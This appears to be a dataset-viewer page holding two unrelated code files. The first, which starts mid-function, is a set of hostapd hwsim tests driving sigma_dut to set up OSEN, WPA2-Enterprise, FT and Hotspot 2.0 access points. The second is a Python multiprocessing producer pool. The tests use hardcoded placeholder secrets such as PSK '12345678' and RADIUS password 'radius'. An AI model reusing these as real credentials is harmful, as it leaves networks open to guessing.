if "ssid,test,bsschannel,1" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_osen(dev, apdev, params):
"""sigma_dut controlled AP with OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP", group="GTK_NOT_USED",
eap="WFA-UNAUTH-TLS", identity="osen@example.com",
ca_cert="auth_serv/ca.pem", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_osen(dev, apdev, params):
"""sigma_dut controlled AP with EAP+OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, bridge="ap-br0", hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP",
eap="WFA-UNAUTH-TLS", identity="osen@example.com",
ca_cert="auth_serv/ca.pem", ieee80211w='2',
scan_freq="2412")
# RSN-EAP (for data connection)
dev[1].connect("test-hs20", key_mgmt="WPA-EAP", eap="TTLS",
identity="hs20-test", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
ieee80211w='2', scan_freq="2412")
hwsim_utils.test_connectivity(dev[0], dev[1], broadcast=False,
success_expected=False, timeout=1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def test_sigma_dut_ap_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_sha256(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-256")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP-SHA256", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP FT-EAP"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_psk(dev, apdev, params):
"""sigma_dut controlled AP FT-PSK"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_psk.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ent_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA-EAP and FT-EAP"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_ent_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ent-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ent-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[1].connect("test-ent-ft-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_venue_url(dev, apdev):
"""sigma_dut controlled Venue URL fetch"""
try:
run_sigma_dut_venue_url(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_venue_url(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, debug=True)
ssid = "venue"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
venue_group = 1
venue_type = 13
venue_info = struct.pack('BB', venue_group, venue_type)
lang1 = "eng"
name1= "Example venue"
lang2 = "fin"
name2 = "Esimerkkipaikka"
venue1 = struct.pack('B', len(lang1 + name1)) + lang1 + name1
venue2 = struct.pack('B', len(lang2 + name2)) + lang2 + name2
venue_name = binascii.hexlify(venue_info + venue1 + venue2)
url1 = "http://example.com/venue"
url2 = "https://example.org/venue-info/"
params["venue_group"] = str(venue_group)
params["venue_type"] = str(venue_type)
params["venue_name"] = [ lang1 + ":" + name1, lang2 + ":" + name2 ]
params["venue_url"] = [ "1:" + url1, "2:" + url2 ]
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "venue", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "venue"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_hs2_venue_info,interface," + ifname + ",Display,Yes")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_hs20_assoc_24(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (2.4 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, True)
def test_sigma_dut_hs20_assoc_5(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (5 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, False)
def run_sigma_dut_hs20_assoc(dev, apdev, band24):
hapd0 = None
hapd1 = None
try:
bssid0 = apdev[0]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
hapd0 = hostapd.add_ap(apdev[0], params)
bssid1 = apdev[1]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
params["hw_mode"] = "a"
params["channel"] = "36"
params["country_code"] = "US"
hapd1 = hostapd.add_ap(apdev[1], params)
band = "2.4" if band24 else "5"
exp_bssid = bssid0 if band24 else bssid1
run_sigma_dut_hs20_assoc_2(dev, apdev, band, exp_bssid)
finally:
dev[0].request("DISCONNECT")
if hapd0:
hapd0.request("DISABLE")
if hapd1:
hapd1.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def run_sigma_dut_hs20_assoc_2(dev, apdev, band, expect_bssid):
check_eap_capa(dev[0], "MSCHAPV2")
dev[0].flush_scan_cache()
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, debug=True)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,HS2-R3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_add_credential,interface,%s,type,uname_pwd,realm,example.com,username,hs20-test,password,password" % ifname)
res = sigma_dut_cmd_check("sta_hs2_associate,interface,%s,band,%s" % (ifname, band),
timeout=15)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
if "BSSID," + expect_bssid not in res:
raise Exception("Unexpected BSSID: " + res)
def test_sigma_dut_ap_hs20(dev, apdev, params):
"""sigma_dut controlled AP with Hotspot 2.0 parameters"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_hs20.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,program,HS2-R3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,WLAN_TAG,1,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,HESSID,02:12:34:56:78:9a,NAI_REALM_LIST,1,OPER_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OSU_SERVER_URI,https://example.com/ https://example.org/,OSU_SSID,test-osu,OSU_METHOD,SOAP SOAP,OSU_PROVIDER_LIST,10,OSU_PROVIDER_NAI_LIST,4")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,NET_AUTH_TYPE,2")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,VENUE_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,DOMAIN_LIST,example.com")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OPERATOR_ICON_METADATA,1")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,test-osu,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,2,OSU,1")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "r") as f:
logger.debug("hostapd.conf from sigma_dut:\n" + f.read())
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
|
producer_pool.py
|
try:
import Queue
except:
import queue as Queue
import logging
import multiprocessing
import os
import sys
import time
import traceback
import numpy as np
logger = logging.getLogger(__name__)
class NoResult(Exception):
pass
class ParentDied(Exception):
pass
class WorkersDied(Exception):
pass
class ProducerPool(object):
def __init__(self, callables, queue_size=10):
self.__watch_dog = multiprocessing.Process(target=self.__run_watch_dog, args=(callables,))
self.__stop = multiprocessing.Event()
self.__result_queue = multiprocessing.Queue(queue_size)
def __del__(self):
self.stop()
def start(self):
'''Start the pool of producers.'''
if self.__watch_dog is None:
raise RuntimeError("can't start a ProducerPool a second time")
if self.__watch_dog.is_alive():
logger.warning("trying to start workers, but they are already running")
return
self.__stop.clear()
self.__watch_dog.start()
def get(self, timeout=0):
'''Return the next result from the producer pool.
If timeout is set and there is not result after the given number of
seconds, exception NoResult is raised.
'''
block = False
if timeout == 0:
timeout = 1
block = True
item = None
while item == None:
try:
item = self.__result_queue.get(timeout=timeout)
except Queue.Empty:
if not block:
raise NoResult()
if isinstance(item, Exception):
raise item
return item
def stop(self):
'''Stop the pool of producers.
Items currently being produced will not be waited for and be discarded.'''
if self.__watch_dog is None:
return
self.__stop.set()
self.__watch_dog.join()
self.__watch_dog = None
def __run_watch_dog(self, callables):
parent_pid = os.getppid()
logger.debug("watchdog started with PID " + str(os.getpid()))
logger.debug("parent PID " + str(parent_pid))
workers = [ multiprocessing.Process(target=self.__run_worker, args=(c,)) for c in callables ]
try:
logger.debug("starting %d workers"%len(workers))
for worker in workers:
worker.start()
while not self.__stop.wait(1):
if os.getppid() != parent_pid:
logger.error("parent of producer pool died, shutting down")
self.__result_queue.put(ParentDied())
break
if not self.__all_workers_alive(workers):
logger.error("at least one of my workers died, shutting down")
self.__result_queue.put(WorkersDied())
break
except:
pass
finally:
logger.info("terminating workers...")
for worker in workers:
worker.terminate()
logger.info("joining workers...")
for worker in workers:
worker.join()
logger.info("done")
def __run_worker(self, target):
parent_pid = os.getppid()
logger.debug("worker started with PID " + str(os.getpid()))
logger.debug("parent PID " + str(parent_pid))
result = None
np.random.seed(None)
while True:
if os.getppid() != parent_pid:
logger.debug("worker %d: watch-dog died, stopping"%os.getpid())
break
if result is None:
try:
result = target()
except Exception as e:
result = e
traceback.print_exc()
# don't stop on normal exceptions -- place them in result queue
# and let them be handled by caller
except:
logger.error("received error: " + str(sys.exc_info()[0]))
# this is most likely a keyboard interrupt, stop process
break
try:
self.__result_queue.put(result, timeout=1)
result = None
except Queue.Full:
logger.debug("worker %d: result queue is full, waiting to place my result"%os.getpid())
logger.debug("worker with PID " + str(os.getpid()) + " exiting")
os._exit(1)
def __all_workers_alive(self, workers):
return all([ worker.is_alive() for worker in workers ])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.